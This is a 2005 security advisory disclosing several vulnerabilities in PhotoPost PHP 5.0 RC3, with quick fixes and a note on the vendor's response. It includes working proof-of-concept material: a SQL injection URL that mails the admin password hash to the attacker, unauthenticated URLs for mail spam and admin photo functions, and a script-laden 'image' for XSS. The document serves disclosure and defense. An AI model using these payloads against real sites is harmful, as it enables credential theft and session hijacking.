<<< Date Index >>>     <<< Thread Index >>>

PhotoPost PHP 5.0 RC3, and later, multiple vulnerabilities



  PhotoPost 5.0RC3, All Enthusiast, Inc, multiple vulnerabilities

  March 05 2005

  For your consideration.
  
  1. BACKGROUND
     PhotoPost is a popular commercial image publishing software.
     Everyone loves showing off their photos! Add PhotoPost to your site, or 
let us install it for you,
     and your visitors will be able to upload their photos to galleries on your 
site and interact in photo
     discussions. Join the 3,500+ sites that are already using PhotoPost and 
add a fun new dimension to your website.
     ....
     Yeah, it is just that bad.
     
  2. IMPACT
      A series of vulnerabilities allows a remote attacker
      - to get arbitrary data from photopost tables (*)
      - to spam administrator mailbox
      - to steal sessions
      - to manipulate photographs
      - TO XSS PhotoPost
        (*) under some configuration, I will describe it in details
        later
      - to upload "image" files with arbitrary content
        
 3.  SEVERITY
      HIGH

  4. ANALYSIS
  
     4.1 GETTING ARBITRARY DATA FROM PHOTOPOST TABLES
             PhotoPost (further on - PP) is built on a highly risky principle
          of filtering input data, based on magic_quotes:
          =------
          magic_quotes_gpc boolean
                 Sets the magic_quotes state for GPC (Get/Post/Cookie) 
operations.
                 When magic_quotes are on, all ' (single-quote), " (double 
quote), \ (backslash) and NUL's are escaped with a backslash automatically.
          =------
             Turning magic_quotes on is neglected by a large percentage of PP 
users.
          It is a good idea not to rely on user interaction in the essential 
matter of
          data filtering and write nested procedures based on on the 
mysql_escape_string/mysql_real_escape_string
          functions instead. Adding a few native strings of code would have 
definitely
          fixed that "human" factor.
             Many users do not have any idea what magic_quotes is and
          what it is for and what their negligence will lead them to, even 
despite a
          warning PP gives while installing. If one were to
          look into architecture PP is assembled upon, it would become clear
          that PP should even not attempt to install itself on systems with
          magic_quotes turned off.
          
          PROOF of CONCEPT
          To see whether PP is running in the environment with magic quotes
          turned off one might use the following URL:
          
http://photopost.hosting.site/photopost/member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0","yourmail@xxxxxxxxx",%20concat(username,"%20",%20password)%20from%20users
          no login required
          
             * replace yourmail@xxxxxxxxx for your email. If the magic
             quotes turned off you'll get admin MD5 hash and user name on your 
mail.

             * this URL might not work out if the site has an old mySQL version
             =---
             UNION is used to combine the result from many SELECT statements 
into one result set. UNION is available from MySQL 4.0.0 on
             .....
             =---
             UNION is the only way to effectively exploit PHP based
             queries, due to the security mysql_query provides. It was
             clever of PHP developers not to allow multiple queries
             divided by ';'
             
           QUICK FIX
            .htaccess
              php_value magic_quotes_gpc 1

             
     4.2  CODING NEGLIGENCE
          Analysis of the query (I) leads only to another security
          issue with PP. It has plenty unsafe requests like
             
          "SELECT joindate,email,username FROM {$Globals['pp_db_prefix']}users 
WHERE userid=$uid"
                 
          Notice the fact database field userid is compared with
          $uid. $uid is supplied by the user and thereby it's content
          is arbitrary and still there is no quotes, no is_alpha,
          intval check, nothing of the kind. Looking at the code in
          random shows that, from time to time, PP is doing the
          checking but the rule is not universal.

          Even if the magic_quotes were turned on it might be possible
          to devise a query that could pass, one way or another
          through and get data posted on your mail anyway. But, the
          example query (I) won't do it. It just constructed to pass through
          several conditions that stands before 'send' is invoked.
          
          QUICK FIX
            1).htaccess
              php_value magic_quotes_gpc 1
              It will at least make it more difficult
            
     4.3  SPAMING ADMINISTRATOR MAILBOX WITH ARBITRARY CONTENT
          PP doesn't always check if the user is authorized. Though,
          as in this particular case, three is a login attempt, it
          won't interact with it's status.
          
          The other problem is that PP absolutely doesn't care how
          much events were served, say - mail sending, how often,
          or how much authorization attempts were done, it is kind of
          a lack of policy, combined it could lead to spam.
          
          PROOF of CONCEPT
          
http://photopost.hosting.site/photopost/misc.php?action=reportpost&report=1&final=1
          no login required

          using this URL one may spam administrator email with
          arbitrary number of letters and PP won't even try to stop it

          QUICK FIX
             adding
             if ($User['userid'] == "") {
                 diewell( $Globals['pp_lang']['noreg'] );
             }
             after authenticate() is invoked. in the if($action =
             "reportpost") section should fix the problem with
             unauthorized users.
             
             But it won't fix the problem in general, anyone who is
             authorized will be able to spam administrator.
             
          
     4.4  MANIPULATING USER PHOTOGRAPHS
          The problem is related to adm-photo.php, despite all the rest
          administrator scripts it doesn't require "adm-inc.php".
          adm-inc.php has a built-in check that won't allow anybody
          except administrator to pass further. That fact opens the
          door to the set of administrator functions built into
          adm-photo.php for everyone.

          As an example I decided to construct URL that would
          rebuild thumbnails for a picture with a given PID (in our case
          it is 1), namely - it will rotate it clockwise.

          ROOF of CONCEPT
          
http://photopost.hosting.site/photopost/adm-photo.php?ppaction=manipulate&pid=1&dowhat=rebuildthumb&dowhat=rotateccw
          no login required

          I'm not sure it is not one of the "features" but it looks like
          no one but admin should be allowed to to this job.

          QUICK FIX
           I believe adding
           require "adm-inc.php";
           will solve the problem.
           

     4.5 INSERTING ARBITRARY HTML CODE

          XSS1
      
          And finally, there is CSS in the PP.
          
          function check_tags($data, $allowed){
              $data = preg_replace("/<(.*?)>/e",
              "process_tag(stripslashes('\\1'), \$allowed)",
              $data);
              $data = str_replace('javascript:','#',$data);
              return $data;
         }

         I won't comment it. This is a very, very bad habit to check
         javascript:

         In short, it is possible to form data the way PP will upload
         a given URL. Then it will "check" javascript using this lame
         rule.

         XSS2
             PP doesn't check biography field 'editbio' in the user profile,
             so, it can easily contain any arbitrary HTML code, tags,
             javascript, when the personal information is viewed it
             the session might be stolen.

         QUICK FIX
         None

     4.6 UPLOADING IMAGES WITH ARBITRARY CONTENT
      
          PP allows to upload any file disguised as an image. It
          neither performs check of the file nor it tries to trim it
          to some internal standard. Basically one uploads JS as an
          image into PP then spreads a DIRECT link on the uploaded
          image. IE will execute JS from a broken image transparently.
          
          PROOF OF CONCEPT
          injected.gif
          <script>
           document.write('<img 
src=http://www.microsoft.com/h/en-us/i/ts_1024_25_BillGWebcastB.jpg>');
            alert('Injected');
          </script>

          PP SHOULD load 'as a picture; and then, in case of success,
          save as a pictur' all the uploaded images to guarantee that
          file content is at least image/gif.
          
         QUICK FIX
         None
         
 5.  VENDOR STATUS
 
     Informed a week ago by mail. With no response.
     Next time, if I have time to explore sources again, I'll not inform this
     particular vendor.  When this article was posted in the private PP forum
     it was removed almost immediately.

     Today I've got a letter (not personal) about a new 5.01 release. When
     looking in the fixed files I saw that it really fixes some issues with PP,
     that were described in this article. Especially the e-mail bypass
     will not work in 5.01 under no condition.

     I believe you may easily find the vulnerable versions, as well as
     some of the source codes :-) with google.com
     
      
-- 
Best regards